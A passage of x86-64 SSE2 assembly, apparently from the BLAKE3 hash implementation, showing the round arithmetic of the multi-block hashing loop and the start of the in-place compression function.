pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
mov eax, r13d
jne 9b
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
test esi, 0x2
je 3f
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
movd xmm13, dword ptr [rsp+0x124]
punpckldq xmm14, xmm13
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
shl rax, 0x20
or rax, 0x40
movq xmm3, rax
movdqa xmmword ptr [rsp+0x20], xmm3
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
punpcklqdq xmm3, xmmword ptr [rsp+0x20]
punpcklqdq xmm11, xmmword ptr [rsp+0x20]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pand xmm13, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm12, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm13, xmm12
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
movdqa xmm13, xmm6
pand xmm12, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm13, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm12, xmm13
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pand xmm6, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm5, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm6, xmm5
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
movdqa xmmword ptr [rsp+0x30], xmm2
movdqa xmm2, xmm14
pand xmm5, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm2, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm5, xmm2
movdqa xmm2, xmmword ptr [rsp+0x30]
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
mov eax, dword ptr [rsp+0x130]
neg eax
mov r10d, dword ptr [rsp+0x110+8*rax]
mov r11d, dword ptr [rsp+0x120+8*rax]
mov dword ptr [rsp+0x110], r10d
mov dword ptr [rsp+0x120], r11d
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl rax, 32
or rax, 64
movq xmm12, rax
movdqa xmm3, xmm13
punpcklqdq xmm3, xmm12
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
blake3_compress_in_place_sse2:
_blake3_compress_in_place_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
